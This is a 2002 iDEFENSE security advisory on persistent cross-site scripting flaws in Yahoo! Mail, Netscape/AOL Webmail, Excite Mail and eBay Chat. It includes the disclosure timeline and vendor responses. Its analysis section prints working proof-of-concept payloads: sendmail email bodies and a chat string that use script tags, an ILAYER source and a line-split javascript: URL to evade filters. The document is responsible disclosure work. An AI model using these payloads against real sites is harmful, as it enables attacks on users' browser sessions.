I. BACKGROUND
Many web applications generate dynamic HTML web pages using user-submitted data and other sources of "untrusted content." web applications not meticulously filtering this untrusted content before presenting the web page to the user may allow for the manipulation of the web page and its content interpretation by a web browser. This
issue becomes dangerous when untrusted content is able to be inserted into a dynamic HTML web page via a web application or other means, causing the content to execute potentially malicious code within a users browser with the exact same privileges of the legitimate web server.
II. DESCRIPTION
Some web applications such as Yahoo Mail and others, already meticulously filter incoming untrusted data before the content reaches their users. However, given the loose interpretation of HTML/JavaScript/VBScript etc. by various web browsers, obfuscated
content may elude the current filters and execute within the users browser environment, thereby allowing an attacker to target users almost instantly without relying on the user performing any activities other than normal usage. All vulnerabilities affect web browsers create by Microsoft Corp. or Netscape Communication Corp. These types of XSS vulnerabilities are usually classified as "constant-state", as they exist persistently for more than just one HTTP request. More detailed XSS exploitation scenarios are detailed in an iDEFENSE paper available at http://www.idefense.com/XSS.html.
III. ANALYSIS
Yahoo! Mail
The following XSS vulnerability only existed for Netscape 4.x browsers (see Vendor Response, this issue in Yahoo has since been addressed):
bash$ sendmail -t target@yahoo.com
Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack
<HTML><BODY>
<ILAYER SRC="script.js"></ILAYER>
</BODY></HTML>
.
--------------------------------------------------
Netscape/AOL Webmail
This XSS vulnerability exists in Netscape Mail (webmail.netscape.com) and AOL Webmail (webmail.aol.com). The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x:
bash$ sendmail -t target@netscape.net
Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack
<HTML><BODY>
<IMG SRC="javasc
ript:alert('test');">
</BODY></HTML>
.
--------------------------------------------------
Excite Webmail
It would seem that Excite does not perform any filtering of HTML/SCRIPT whatsoever. The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x/6.x:
bash$ sendmail -t target@excite.com
Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack
<HTML><BODY>
<SCRIPT>alert(document.domain);</SCRIPT>
</BODY></HTML>
.
--------------------------------------------------
eBay Chat
While you are logged in as an eBay user, place the text sting below within the chat text field and click submit. The message will appear within the main chat text message and will execute in a user's browser when read. The following XSS behavior can be caused in both IE 5.x/6.x and Netscape 4.x:
---- XSS String ------------------------------------
<IMG SRC="javasc
ript:alert(document.domain);">
----------------------------------------------------
IV. DETECTION
The following are affected:
Yahoo! Mail http://mail.yahoo.com
Netscape Mail http://webmail.netscape.com
AOL Webmail http://webmail.aol.com (same as Netscape Mail)
Excite Mail http://mail.excite.com
eBay Chat http://pages.ebay.com/community/chat/index.html
V. WORKAROUND
No workaround is available as of this writing.
VI. VENDOR FIX/RESPONSE
On July 16, 2002, Scott Renfro (scottr@yahoo-inc.com), who goes by the title "Paranoid Yahoo," said that the issue was fixed in Yahoo! Mail.
VII. CVE INFORMATION
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project did not assign identification numbers to these issues.
VIII. DISCLOSURE TIMELINE
6/27/02 Issue disclosed to iDEFENSE
7/16/02 Ebay, AOL/Netscape, Yahoo, and Excite notified
7/16/02 iDEFENSE clients notified
8/11/02 Second notice given to Excite, AOL/Netscape, and eBay through web customer service suggestion systems
8/19/02 Still no response from Excite, AOL/Netscape, or eBay
8/19/02 iDEFENSE released public advisory
IX. CREDIT
Jeremiah Grossman (jeremiah@whitehatsec.com) and Lex Arquette(lex@whitehatsec.com) of WhiteHat Security Inc. are credited with discovering these bugs.
